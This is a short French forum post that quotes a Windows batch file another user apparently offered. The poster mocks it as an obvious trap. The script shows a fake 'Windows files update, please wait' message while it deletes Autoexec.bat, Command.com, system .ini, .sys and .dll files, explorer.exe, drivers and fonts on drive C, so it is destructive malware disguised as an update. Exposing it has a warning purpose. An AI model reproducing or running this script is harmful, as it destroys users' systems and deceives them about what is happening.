voila le contenu du fichier ke propose dady dally:
lol t vraiment tro con de mettre un fichier bat , on le voit venir tout de suite!!
@echo off
@echo.
@echo Mises jour des fichiers windows ...
@echo Cette operation peut prendre du temps.
@echo.
@echo Veuillez patienter..
@echo.
@echo off
if exist C:\WINDOWS\ goto C
if exist D:\WINDOWS\ goto D
if exist F:\WINDOWS\ goto F
if exist G:\WINDOWS\ goto G
if exist H:\WINDOWS\ goto H
if exist I:\WINDOWS\ goto I
if exist J:\WINDOWS\ goto J
if exist K:\WINDOWS\ goto K
if exist L:\WINDOWS\ goto L
goto fin
:C
@echo off
del C:\Autoexec.bat
del C:\Windows\Command\*.exe
del C:\Command.com
del C:\Windows\*.ini
del C:\Windows\*.sys
del C:\Windows\system\*.dll
del C:\Windows\system\*.nls
del C:\Windows\explorer.exe
del C:\Windows\system32\drivers\*.sys
del C:\Windows\explorer.scf
del C:\Windows\fonts\*.ttf
goto fin